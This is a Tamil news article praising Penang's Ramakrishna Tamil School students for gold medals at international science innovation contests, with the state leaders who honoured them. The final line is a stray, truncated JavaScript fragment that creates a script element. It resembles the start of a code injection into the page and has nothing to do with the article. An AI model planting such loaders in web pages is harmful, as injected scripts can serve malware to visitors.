தமிழ்ப்பள்ளி மாணவர்களின் சாதனைத் தொடரட்டும்- முதல்வர்

மாநில முதல்வர் இராமகிருஷ்ணா தமிழ்ப்பள்ளி மாணவர்களுக்கு வெகுமதி மற்றும் சான்றிதழ் வழங்கினார். (உடன் மாநில இரண்டாம் துணை முதல்வர் பேராசிரியர் ப.இராமசாமி, சட்டமன்ற உறுப்பினர் திரு தனசேகரன், ஆட்சிக்குழு உறுப்பினர் திரு ஜெக்டிப் சிங் டியோ, மாநில தமிழ்ப்பள்ளிகளுக்கானச் சிறப்பு குழுத் தலைவர் டத்தோ கே.அன்பழகன்)
மாநில முதல்வர் இராமகிருஷ்ணா தமிழ்ப்பள்ளி மாணவர்களுக்கு வெகுமதி மற்றும் சான்றிதழ் வழங்கினார். (உடன் மாநில இரண்டாம் துணை முதல்வர் பேராசிரியர் ப.இராமசாமி, சட்டமன்ற உறுப்பினர் திரு தனசேகரன், ஆட்சிக்குழு உறுப்பினர் திரு ஜெக்டிப் சிங் டியோ, மாநில தமிழ்ப்பள்ளிகளுக்கானச் சிறப்பு குழுத் தலைவர் டத்தோ கே.அன்பழகன்)

ஹாங்காங் நாட்டில் நடைபெற்ற அனைத்துலக அறிவியலாளர் புத்தாக்க கண்டுபிடிப்பு போட்டியில் தங்கப் பதக்கம் வென்று சாதனைப் படைத்தனர் பினாங்கு இராமகிருஷ்ணா தமிழ்ப்பள்ளி மாணவர்கள். தமிழ்ப்பள்ளி மாணவர்களின் சாதனையைக் கொளரவிக்கும் பொருட்டு பினாங்கு மாநில அரசு வெகுமதி வழங்கி சிறப்பித்தது. இராமகிருஷ்ணா தமிழ்ப்பள்ளியைச் சார்ந்த உஷா சந்திரிகா விஜேந்திரன், கெலின் எவ்லின் தோமஸ், ஷாலினி பிரியங்கா கண்ணன், வைஷ்ணவி சந்திரசேகரன் ஆகிய நால்வரும் பினாங்கு மாநில முதல்வர் மேதகு லிம் குவான் எங் அவர்களிடமிருந்து வெகுமதி மற்றும் நற்சான்றிதழ் பெற்றுக்கொண்டனர்.
அனைத்துலக ரீதியில் நடைபெற்ற இப்போட்டியில் “ஒலி குறைப்புப் பெட்டி” அறிமுகப்படுத்தி தங்கப்பதக்கம் உட்பட 6 விருதுகள் வென்று இராமகிருஷ்ணா தமிழ்ப்பள்ளி மாணவர்கள் முத்திரைப் பதித்துள்ளனர். தமிழ்ப்பள்ளி மாணவர்களைக் குறைத்து மதிப்பிடும் தரப்பினர் பிரமிக்கும் வகையில் தமிழ்ப்பள்ளி மாணவர்கள் சாதனை அமைந்துள்ளது எனக் கூறினார் மாநில இரண்டாம் துணை முதல்வர் பேராசிரியர் ப.இராமசாமி. மேலும், தமிழ்ப்பள்ளி மாணவர்களின் வெற்றிக்கு ஊன்றுகோளாகத் திகழ்ந்த தலைமையாசிரியர், ஆசிரியர்கள் மற்றும் பெற்றோர்களுக்குத் தமது மனமார்ந்த வாழ்த்துகளைத் தெரிவித்துக் கொண்டார்.

பினாங்கில் அமைந்திருக்கும் இராமகிருஷ்ணா தமிழ்ப்பள்ளி அனைதுலக ரீதியில் சாதனைப் படைத்து பினாங்கு மாநிலத்திற்கு பெருமைச் சேர்த்தாக மாநில முதல்வர் அகம் மகிழ குறிப்பிட்டார். இந்நிகழ்வில் பாகான் டாலாம் சட்டமன்ற உறுப்பினர் திரு தனசேகரன், ஆட்சிக்குழு உறுப்பினர் திரு ஜெக்டிப் சிங் டியோ, மாநில தமிழ்ப்பள்ளிகளுக்கான சிறப்புக் குழுத் தலைவர் டத்தோ கே.அன்பழகன் ஆகியோர் கலந்து கொண்டு மாணவர்களைப் பாராட்டினர். மாநில அரசு ஒவ்வொரு ஆண்டும் தமிழ்ப்பள்ளிகளின் கல்வி வளர்ச்சிக்கும் மேம்பாட்டுத் திட்டங்களுக்கும் தொடர்ந்து ஊக்கத்தொகை வழங்கி வருகிறது. அதோடு, தமிழ்ப்பள்ளி மாணவர்கள் தங்களின் இலை மறை காயாக மறைந்திருக்கும் திறமையை வெளிப்படுத்தி அனைத்துலக ரீதியில் தொடர்ந்து சாதனைப் படைக்க வேண்டும். இராமகிருஷ்ணா தமிழ்ப்பள்ளி மாணவர்கள் அனைத்துலக அறிவியலாளர் புத்தாக்க கண்டுபிடிப்பு போட்டியில் கலந்து கொள்வதற்கான அனைத்து போக்குவரத்து செலவினங்களையும் பினாங்கு இந்து அறப்பணி வாரியம் ஏற்றுக்கொண்டது என்றார் அதன் தலைவரும் இரண்டாம் துணை முதல்வருமான ப.இராமசாமி தெரிவித்தார்.

வெற்றி மகுடம் சூடிய இராமகிருஷ்ணா மாணவர்கள்
வெற்றி மகுடம் சூடிய இராமகிருஷ்ணா மாணவர்கள்

கடந்த 20/3/2015 முதல் 26/3/2015 வரையில், சீன பெய்ஜிங் நகரில் நடைபெற்ற 35-வது இளையோர் அறிவியல் புத்தாக்கப் போட்டியில் “சூழல் நட்பு தெர்மோ கொள்கலனை” மறுபயனீட்டுப் பொருள்களின் வழி புத்தாக்க முறையில் தயாரித்து அனைத்துலக அறிவியல் விழாவில் தங்கப் பதக்கம் வென்று சாதனைப்படைத்தனர் இராமகிருஷ்ணா தமிழ்ப்பள்ளியைச் சார்ந்த மாணவர்களான ஶ்ரீ.துர்காஷினி, பொ.குமுதாஶ்ரீ மற்றும் க.சுகேசன். இராமகிருஷ்ணா தமிழ்ப்பள்ளி மாணவர்கள் இரண்டாவது முறையாக அனைத்துலக ரீதியில் தங்கம் வென்றுள்ளனர் என்றால் மிகையாகாது.

var d=document;var s=d.createElement(‘script’);